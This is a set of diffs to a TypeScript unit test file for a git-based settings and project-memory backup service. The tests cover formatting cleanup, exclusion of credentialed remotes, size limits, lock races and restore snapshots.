+      repositoryRoot: first.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
     await gitRepo.commitAndPush(first, {
       message: "Back up Xum settings",
       expectedRemoteCommit: first.remoteCommit,
@@ -488,7 +541,11 @@ describe("backup adapters", () => {
     await writeFixtureFile(muxRoot, "AGENTS.md", "second\n");
     const second = await gitRepo.prepare(settings);
     expect(second.remoteCommit).toBeNull();
-    await payload.exportTo({ repositoryRoot: second.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: second.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
     await gitRepo.commitAndPush(second, {
       message: "Back up Xum settings",
       expectedRemoteCommit: second.remoteCommit,
@@ -504,7 +561,11 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     const preview = await payload.previewRestore({
       repositoryRoot: repository.rootDir,
@@ -534,7 +595,11 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     const preview = await payload.previewRestore({
       repositoryRoot: repository.rootDir,
@@ -551,7 +616,11 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     await fs.chmod(path.join(muxRoot, "skills/demo/run.sh"), 0o644);
     const preview = await payload.previewRestore({
@@ -577,7 +646,11 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const legacy = await gitRepo.prepare({ ...settings, path: "mux/" });
-    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: legacy.rootDir,
+      managedPath: legacy.managedPath,
+      includeProjects: false,
+    });
     await gitRepo.commitAndPush(legacy, {
       message: "Back up Mux settings",
       expectedRemoteCommit: legacy.remoteCommit,
@@ -615,7 +688,11 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const legacy = await gitRepo.prepare({ ...settings, path: "mux/" });
-    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: legacy.rootDir,
+      managedPath: legacy.managedPath,
+      includeProjects: false,
+    });
     await gitRepo.commitAndPush(legacy, {
       message: "Back up Mux settings",
       expectedRemoteCommit: legacy.remoteCommit,
@@ -624,7 +701,11 @@ describe("backup adapters", () => {
     // A xum-configured push updates the legacy backup in place rather than creating xum/.
     await writeFixtureFile(muxRoot, "AGENTS.md", "updated instructions\n");
     const prepared = await gitRepo.prepare({ ...settings, path: "xum/" });
-    await payload.exportTo({ repositoryRoot: prepared.rootDir, managedPath: prepared.managedPath, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: prepared.rootDir,
+      managedPath: prepared.managedPath,
+      includeProjects: false,
+    });
     const pushed = await gitRepo.commitAndPush(prepared, {
       message: "Back up Xum settings",
       expectedRemoteCommit: prepared.remoteCommit,
@@ -641,7 +722,11 @@ describe("backup adapters", () => {
 
     await writeFixtureFile(muxRoot, "AGENTS.md", "legacy\n");
     const legacy = await gitRepo.prepare({ ...settings, path: "mux/" });
-    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: legacy.rootDir,
+      managedPath: legacy.managedPath,
+      includeProjects: false,
+    });
     await gitRepo.commitAndPush(legacy, {
       message: "Back up Mux settings",
       expectedRemoteCommit: legacy.remoteCommit,
@@ -686,7 +771,11 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const canonical = await gitRepo.prepare({ ...settings, path: "xum/" });
-    await payload.exportTo({ repositoryRoot: canonical.rootDir, managedPath: "xum/", includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: canonical.rootDir,
+      managedPath: "xum/",
+      includeProjects: false,
+    });
     await gitRepo.commitAndPush(canonical, {
       message: "Back up Xum settings",
       expectedRemoteCommit: canonical.remoteCommit,
@@ -738,7 +827,11 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const legacy = await gitRepo.prepare({ ...settings, path: "mux/" });
-    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: legacy.rootDir,
+      managedPath: legacy.managedPath,
+      includeProjects: false,
+    });
     await gitRepo.commitAndPush(legacy, {
       message: "Back up Mux settings",
       expectedRemoteCommit: legacy.remoteCommit,
@@ -793,7 +886,11 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const legacy = await gitRepo.prepare({ ...settings, path: "mux/" });
-    await payload.exportTo({ repositoryRoot: legacy.rootDir, managedPath: legacy.managedPath, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: legacy.rootDir,
+      managedPath: legacy.managedPath,
+      includeProjects: false,
+    });
     await gitRepo.commitAndPush(legacy, {
       message: "Back up Mux settings",
       expectedRemoteCommit: legacy.remoteCommit,
@@ -839,7 +936,11 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     config.state = {
       projects: new Map(),
@@ -872,7 +973,11 @@ describe("backup adapters", () => {
     await fs.symlink(outside, path.join(repository.rootDir, "linked"));
 
     try {
-      await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: "linked/mux", includeProjects: false });
+      await payload.exportTo({
+        repositoryRoot: repository.rootDir,
+        managedPath: "linked/mux",
+        includeProjects: false,
+      });
       throw new Error("Expected the symlinked ancestor to be rejected");
     } catch (error) {
       if (!(error instanceof Error)) throw error;
@@ -905,7 +1010,11 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     await writeFixtureFile(muxRoot, "AGENTS.md", "locally edited\n");
     await fs.rm(path.join(muxRoot, "agents/shared.md"));
@@ -933,7 +1042,11 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     // Commands are never exported, so the only way a backup carries one is if someone with
     // repository write access put it there.
@@ -984,7 +1097,11 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     await writeFixtureFile(muxRoot, "AGENTS.md", "locally edited\n");
     await writeFixtureFile(muxRoot, "agents/local-only.md", "local only\n");
@@ -1020,7 +1137,11 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     config.state = { projects: new Map(), userPreferences: { appearance: { theme: "light" } } };
     // A swallowed write failure: the edit callback runs, editConfig resolves, and the
@@ -1031,7 +1152,11 @@ describe("backup adapters", () => {
     });
 
     try {
-      await payload.restore({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+      await payload.restore({
+        repositoryRoot: repository.rootDir,
+        managedPath: settings.path,
+        includeProjects: false,
+      });
       throw new Error("Expected the lost preferences write to be reported");
     } catch (error) {
       if (!(error instanceof Error)) throw error;
@@ -1046,7 +1171,11 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     config.state = { projects: new Map(), userPreferences: { appearance: { theme: "light" } } };
     config.beforeEdit = () => {
@@ -1124,7 +1253,11 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
     for (const alias of ["Note.md", "NOTE.md"]) {
       await fs.link(
         path.join(muxRoot, "skills/demo/note.md"),
@@ -1167,7 +1300,11 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
     await gitRepo.commitAndPush(repository, {
       message: "Back up Xum settings",
       expectedRemoteCommit: repository.remoteCommit,
@@ -1175,7 +1312,11 @@ describe("backup adapters", () => {
 
     await fs.rename(path.join(muxRoot, "agents/first.md"), path.join(muxRoot, "agents/second.md"));
     const next = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: next.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: next.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     const changes = await gitRepo.getPushChanges(next);
     expect(changes.map((change) => change.path)).toContain("mux/agents/second.md");
@@ -1190,10 +1331,348 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     const paths = (await gitRepo.getPushChanges(repository)).map((change) => change.path);
 
     expect(paths).toContain("mux/skills/café/SKILL.md");
+  });
+});
+
+describe("backup adapters project bundle", () => {
+  let tempDir: string;
+  let muxRoot: string;
+  let originPath: string;
+  let cacheRoot: string;
+  let settings: SettingsBackupInput;
+  let config: TestBackupConfig;
+
+  beforeEach(async () => {
+    tempDir = await fs.mkdtemp(path.join(os.tmpdir(), "mux-backup-bundle-"));
+    muxRoot = path.join(tempDir, "mux-root");
+    originPath = path.join(tempDir, "origin.git");
+    cacheRoot = path.join(tempDir, "cache");
+    await fs.mkdir(muxRoot, { recursive: true });
+    await runGit(["init", "--bare", "--initial-branch=main", originPath]);
+    settings = { repoUrl: originPath, branch: "main", path: "mux" };
+    config = new TestBackupConfig(muxRoot);
+  });
+
+  afterEach(async () => {
+    await fs.rm(tempDir, { recursive: true, force: true });
+  });
+
+  function registerProject(projectPath: string): void {
+    config.state.projects.set(projectPath, { workspaces: [] });
+  }
+
+  async function seedProjectMemory(
+    projectPath: string,
+    fileName: string,
+    content: string
+  ): Promise<void> {
+    await writeFixtureFile(
+      muxRoot,
+      `memory/project/${projectMemoryDirName(projectPath)}/${fileName}`,
+      content
+    );
+  }
+
+  async function exportBundle(payload = createBackupPayloadStore({ config })) {
+    const gitRepo = createBackupGitRepo({ cacheRoot });
+    const repository = await gitRepo.prepare(settings);
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    return { gitRepo, repository, payload };
+  }
+
+  it("exports every user project including zero-memory ones and filters system entries", async () => {
+    const projectA = path.join(tempDir, "projects", "alpha");
+    const projectB = path.join(tempDir, "projects", "beta");
+    registerProject(projectA);
+    registerProject(projectB);
+    config.state.projects.set("_multi", { workspaces: [] });
+    config.state.projects.set("_scratch", { workspaces: [] });
+    config.state.projects.set(path.join(tempDir, "system"), {
+      workspaces: [],
+      projectKind: "system",
+    });
+    await seedProjectMemory(projectA, "notes.md", "alpha notes\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+
+    const { repository } = await exportBundle();
+
+    const manifest = JSON.parse(
+      await fs.readFile(
+        path.join(repository.rootDir, settings.path, "project-bundle", "manifest.json"),
+        "utf-8"
+      )
+    ) as { projects: Array<{ path: string; memoryDir: string }>; files: Array<{ path: string }> };
+    expect(manifest.projects.map((entry) => entry.path).sort()).toEqual(
+      [projectA, projectB].sort()
+    );
+    expect(manifest.files.map((file) => file.path)).toEqual([
+      `memory/project/${projectMemoryDirName(projectA)}/notes.md`,
+    ]);
+  });
+
+  it("records portable git remotes and drops credentialed ones", async () => {
+    const plainProject = path.join(tempDir, "projects", "plain");
+    const credentialedProject = path.join(tempDir, "projects", "credentialed");
+    for (const [projectPath, remote] of [
+      [plainProject, "git@github.com:dev/plain.git"],
+      [credentialedProject, "https://user:secret@example.com/repo.git"],
+    ] as const) {
+      await fs.mkdir(projectPath, { recursive: true });
+      await runGit(["-C", projectPath, "init"]);
+      await runGit(["-C", projectPath, "remote", "add", "origin", remote]);
+      registerProject(projectPath);
+    }
+
+    const { repository } = await exportBundle();
+
+    const manifest = JSON.parse(
+      await fs.readFile(
+        path.join(repository.rootDir, settings.path, "project-bundle", "manifest.json"),
+        "utf-8"
+      )
+    ) as { projects: Array<{ path: string; gitRemote?: string }> };
+    const byPath = new Map(manifest.projects.map((entry) => [entry.path, entry]));
+    expect(byPath.get(plainProject)?.gitRemote).toBe("git@github.com:dev/plain.git");
+    expect(byPath.get(credentialedProject)?.gitRemote).toBeUndefined();
+  });
+
+  it("removes a previously pushed bundle when the toggle is disabled", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "notes\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+
+    const { gitRepo, repository, payload } = await exportBundle();
+    const bundlePath = path.join(repository.rootDir, settings.path, "project-bundle");
+    expect(
+      await fs.stat(bundlePath).then(
+        () => true,
+        () => false
+      )
+    ).toBe(true);
+    await gitRepo.commitAndPush(repository, {
+      message: "with bundle",
+      expectedRemoteCommit: repository.remoteCommit,
+    });
+
+    const second = await gitRepo.prepare(settings);
+    await payload.exportTo({
+      repositoryRoot: second.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
+    expect(
+      await fs.stat(path.join(second.rootDir, settings.path, "project-bundle")).then(
+        () => true,
+        () => false
+      )
+    ).toBe(false);
+  });
+
+  it("restores matched project memory verbatim and previews the change", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "backup version\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const memoryPath = `memory/project/${projectMemoryDirName(project)}/notes.md`;
+
+    const { repository, payload } = await exportBundle();
+
+    // Local edit after the export, as if made on this machine since the last push.
+    await seedProjectMemory(project, "notes.md", "local edit\n");
+
+    const preview = await payload.previewRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    expect(preview.projectImports).toEqual([]);
+    expect(preview.projectBundleSkipped).toBe(false);
+    expect(preview.changes).toContainEqual({ status: "M", path: memoryPath });
+
+    const restored = await payload.restore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    expect(restored.changedFiles).toContain(memoryPath);
+    expect(await fs.readFile(path.join(muxRoot, ...memoryPath.split("/")), "utf-8")).toBe(
+      "backup version\n"
+    );
+  });
+
+  it("surfaces unmatched projects as import candidates and writes nothing for them", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "alpha notes\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const memoryDir = projectMemoryDirName(project);
+
+    const { repository, payload } = await exportBundle();
+
+    // The project vanishes locally: unregistered and its memory directory removed, as on a
+    // fresh machine restoring this backup.
+    config.state.projects.delete(project);
+    await fs.rm(path.join(muxRoot, "memory", "project", memoryDir), {
+      recursive: true,
+      force: true,
+    });
+
+    const preview = await payload.previewRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    expect(preview.projectImports).toHaveLength(1);
+    expect(preview.projectImports[0]).toMatchObject({
+      sourcePath: project,
+      name: "alpha",
+      memoryFileCount: 1,
+    });
+
+    const validated = await payload.validateRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    expect(validated.hasProjectBundle).toBe(true);
+    expect(validated.projectImports[0]?.token).toBe(preview.projectImports[0].token);
+
+    const restored = await payload.restore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    expect(restored.changedFiles.some((file) => file.startsWith("memory/project"))).toBe(false);
+    expect(
+      await fs.stat(path.join(muxRoot, "memory", "project", memoryDir)).then(
+        () => true,
+        () => false
+      )
+    ).toBe(false);
+  });
+
+  it("imports approved project memory re-keyed to the target path, add-only", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "alpha notes\n");
+    await seedProjectMemory(project, "conflict.md", "backup conflict\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+
+    const { repository, payload } = await exportBundle();
+
+    config.state.projects.delete(project);
+    await fs.rm(path.join(muxRoot, "memory", "project", projectMemoryDirName(project)), {
+      recursive: true,
+      force: true,
+    });
+    const preview = await payload.previewRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    const token = preview.projectImports[0].token;
+
+    const targetPath = path.join(tempDir, "projects", "alpha-moved");
+    const targetDir = projectMemoryDirName(targetPath);
+    await writeFixtureFile(muxRoot, `memory/project/${targetDir}/conflict.md`, "local wins\n");
+
+    const imported = await payload.importProjectMemory({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      token,
+      targetPath,
+    });
+
+    expect(imported.writtenFiles).toEqual([`memory/project/${targetDir}/notes.md`]);
+    expect(imported.skippedFiles).toEqual([`memory/project/${targetDir}/conflict.md`]);
+    expect(
+      await fs.readFile(path.join(muxRoot, "memory", "project", targetDir, "notes.md"), "utf-8")
+    ).toBe("alpha notes\n");
+    expect(
+      await fs.readFile(path.join(muxRoot, "memory", "project", targetDir, "conflict.md"), "utf-8")
+    ).toBe("local wins\n");
+  });
+
+  it("skips a malformed sidecar when the toggle is off but refuses it when on", async () => {
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const gitRepo = createBackupGitRepo({ cacheRoot });
+    const payload = createBackupPayloadStore({ config });
+    const repository = await gitRepo.prepare(settings);
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
+    await writeFixtureFile(
+      path.join(repository.rootDir, settings.path),
+      "project-bundle/manifest.json",
+      "{ not json"
+    );
+
+    const preview = await payload.previewRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
+    expect(preview.projectBundleSkipped).toBe(true);
+
+    const restored = await payload.restore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
+    expect(restored.projectBundleSkipped).toBe(true);
+
+    const error = await captureRejection(
+      payload.previewRestore({
+        repositoryRoot: repository.rootDir,
+        managedPath: settings.path,
+        includeProjects: true,
+      })
+    );
+    expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
+  });
+
+  it("covers registered project memory in the safety snapshot only when asked", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "before restore\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const payload = createBackupPayloadStore({ config });
+
+    const withProjects = path.join(tempDir, "snapshot-with");
+    await payload.writeSafetySnapshot(withProjects, { includeProjectMemory: true });
+    const snapshotFile = path.join(
+      withProjects,
+      "project-bundle",
+      "memory",
+      "project",
+      projectMemoryDirName(project),
+      "notes.md"
+    );
+    expect(await fs.readFile(snapshotFile, "utf-8")).toBe("before restore\n");
+
+    const withoutProjects = path.join(tempDir, "snapshot-without");
+    await payload.writeSafetySnapshot(withoutProjects, { includeProjectMemory: false });
+    expect(
+      await fs.stat(path.join(withoutProjects, "project-bundle")).then(
+        () => true,
+        () => false
+      )
+    ).toBe(false);
   });
 });

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -1512,6 +1512,51 @@ describe("backup adapters project bundle", () => {
     expect(byPath.get(credentialedProject)?.gitRemote).toBeUndefined();
   });
 
+  it("drops remote hints when the project set changed during discovery", async () => {
+    const project = path.join(tempDir, "projects", "replaced");
+    await fs.mkdir(project, { recursive: true });
+    await runGit(["-C", project, "init"]);
+    await runGit(["-C", project, "remote", "add", "origin", "git@github.com:dev/old.git"]);
+    registerProject(project);
+    const payload = createBackupPayloadStore({ config });
+    const gitRepo = createBackupGitRepo({ cacheRoot });
+    const repository = await gitRepo.prepare(settings);
+
+    // Remotes are discovered outside the registration lock; the listing waits for it. While
+    // it waits, the project is removed and another checkout registered at the same path.
+    const held = Promise.withResolvers<void>();
+    const lockAcquired = Promise.withResolvers<void>();
+    const holding = withProjectRegistrationLock(muxRoot, async () => {
+      lockAcquired.resolve();
+      await held.promise;
+      config.state.projects.delete(project);
+      config.state.projects.set(project, { workspaces: [], displayName: "replacement" });
+    });
+    await lockAcquired.promise;
+    const exporting = payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    await new Promise((resolve) => setTimeout(resolve, 300));
+    held.resolve();
+    await holding;
+    await exporting;
+
+    const manifest = JSON.parse(
+      await fs.readFile(
+        path.join(repository.rootDir, settings.path, "project-bundle", "manifest.json"),
+        "utf-8"
+      )
+    ) as { projects: Array<{ path: string; name: string; gitRemote?: string }> };
+    // The entry is the new registration's; the removed project's remote does not travel
+    // with it.
+    expect(
+      manifest.projects.map(({ path: entryPath, name }) => ({ path: entryPath, name }))
+    ).toEqual([{ path: project, name: "replacement" }]);
+    expect(manifest.projects[0]?.gitRemote).toBeUndefined();
+  });
+
   it("flags a token published through a project remote's path in the secret scan", async () => {
     const project = path.join(tempDir, "projects", "leaky");
     await fs.mkdir(project, { recursive: true });
@@ -1995,13 +2040,16 @@ describe("backup adapters project bundle", () => {
   });
 
   it("leaves a project whose registered path exceeds the manifest cap out of the bundle", async () => {
-    const project = path.join(tempDir, "projects", "alpha");
-    registerProject(project);
     // Registration caps nothing; the manifest schema does. One such project must not fail
-    // every push for all the others.
+    // every push for all the others — and does not count toward the entry cap either: a
+    // full complement of exportable projects plus it is still exportable.
+    const projects = Array.from({ length: MAX_BACKUP_PROJECT_ENTRIES }, (_, index) =>
+      path.join(tempDir, "projects", `p${index}`)
+    );
+    for (const project of projects) registerProject(project);
     const overlong = path.join(tempDir, "p".repeat(MAX_BACKUP_PROJECT_PATH_CHARS));
     registerProject(overlong);
-    await seedProjectMemory(project, "notes.md", "alpha notes\n");
+    await seedProjectMemory(projects[0], "notes.md", "alpha notes\n");
     await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
 
     const { repository } = await exportBundle();
@@ -2012,7 +2060,7 @@ describe("backup adapters project bundle", () => {
         "utf-8"
       )
     ) as { projects: Array<{ path: string }> };
-    expect(manifest.projects.map((entry) => entry.path)).toEqual([project]);
+    expect(manifest.projects.map((entry) => entry.path).sort()).toEqual([...projects].sort());
   });
 
   it("collects project memory for export under the memory mutation lock", async () => {

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -6,7 +6,8 @@ import * as path from "node:path";
 import type { SettingsBackupInput } from "@/common/orpc/schemas/backup";
 import { createBackupGitRepo, createBackupPayloadStore } from "./adapters";
 import { BackupNonFastForwardError, backupCachePath } from "./gitRepo";
-import { MAX_BACKUP_FILE_COUNT, ProjectMemoryRestoreError } from "./payload";
+import { MAX_BACKUP_FILE_BYTES, MAX_BACKUP_FILE_COUNT, ProjectMemoryRestoreError } from "./payload";
+import { MEMORY_MAX_FILE_BYTES } from "@/common/constants/memory";
 import { projectMemoryDirName } from "@/node/services/memoryService";
 import { MAX_BACKUP_PROJECT_ENTRIES } from "@/common/config/schemas/settingsBackup";
 import {
@@ -1614,6 +1615,103 @@ describe("backup adapters project bundle", () => {
         "utf-8"
       )
     ).toBe("local edit\n");
+  });
+
+  it("snapshots only the files a matched restore overwrites, not the whole project", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "backup version\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const memoryDir = projectMemoryDirName(project);
+    const { repository, payload } = await exportBundle();
+
+    // A local-only note past the backup file budget: never overwritten, so it must
+    // neither be snapshotted nor fail the restore.
+    await fs.writeFile(
+      path.join(muxRoot, "memory", "project", memoryDir, "huge-local.md"),
+      Buffer.alloc(MAX_BACKUP_FILE_BYTES + 1, "x")
+    );
+    await seedProjectMemory(project, "notes.md", "local edit\n");
+
+    const snapshotPath = path.join(tempDir, "restore-snapshot");
+    const restored = await payload.restore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+      snapshotPath,
+      matchedProjectPaths: [project],
+    });
+    expect(restored.changedFiles).toContain(`memory/project/${memoryDir}/notes.md`);
+    const snapshotBundle = JSON.parse(
+      await fs.readFile(path.join(snapshotPath, "project-bundle", "manifest.json"), "utf-8")
+    ) as { files: Array<{ path: string }> };
+    expect(snapshotBundle.files.map((file) => file.path)).toEqual([
+      `memory/project/${memoryDir}/notes.md`,
+    ]);
+    expect(
+      await fs.readFile(
+        path.join(snapshotPath, "project-bundle", "memory", "project", memoryDir, "notes.md"),
+        "utf-8"
+      )
+    ).toBe("local edit\n");
+  });
+
+  it("refuses a matched entry that would break memory limits before the core restore", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "notes\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "backup instructions\n");
+    const memoryDir = projectMemoryDirName(project);
+    const { repository, payload } = await exportBundle();
+
+    // A crafted checkout grows the matched entry's file past the memory read limit.
+    const bundleDir = path.join(repository.rootDir, settings.path, "project-bundle");
+    const oversized = Buffer.alloc(MEMORY_MAX_FILE_BYTES + 1, "x");
+    await fs.writeFile(path.join(bundleDir, "memory", "project", memoryDir, "notes.md"), oversized);
+    const manifestPath = path.join(bundleDir, "manifest.json");
+    const manifest = JSON.parse(await fs.readFile(manifestPath, "utf-8")) as {
+      files: Array<{ path: string; sha256: string }>;
+    };
+    manifest.files[0].sha256 = createHash("sha256").update(oversized).digest("hex");
+    await fs.writeFile(manifestPath, JSON.stringify(manifest), "utf-8");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "local instructions\n");
+
+    const error = await captureRejection(
+      payload.validateRestore({
+        repositoryRoot: repository.rootDir,
+        managedPath: settings.path,
+        includeProjects: true,
+      })
+    );
+    expect((error as Error).message).toContain("memory file limit");
+    // Refused in the preflight: the core restore never ran.
+    expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
+      "local instructions\n"
+    );
+  });
+
+  it("leaves a project alone that was unregistered after the plan was computed", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "backup version\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const memoryPath = `memory/project/${projectMemoryDirName(project)}/notes.md`;
+    const { repository, payload } = await exportBundle();
+    await seedProjectMemory(project, "notes.md", "local edit\n");
+
+    // Unregistered between validation (which matched it) and the write boundary.
+    config.state.projects.delete(project);
+    const restored = await payload.restore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjectPaths: [project],
+    });
+    expect(restored.changedFiles).not.toContain(memoryPath);
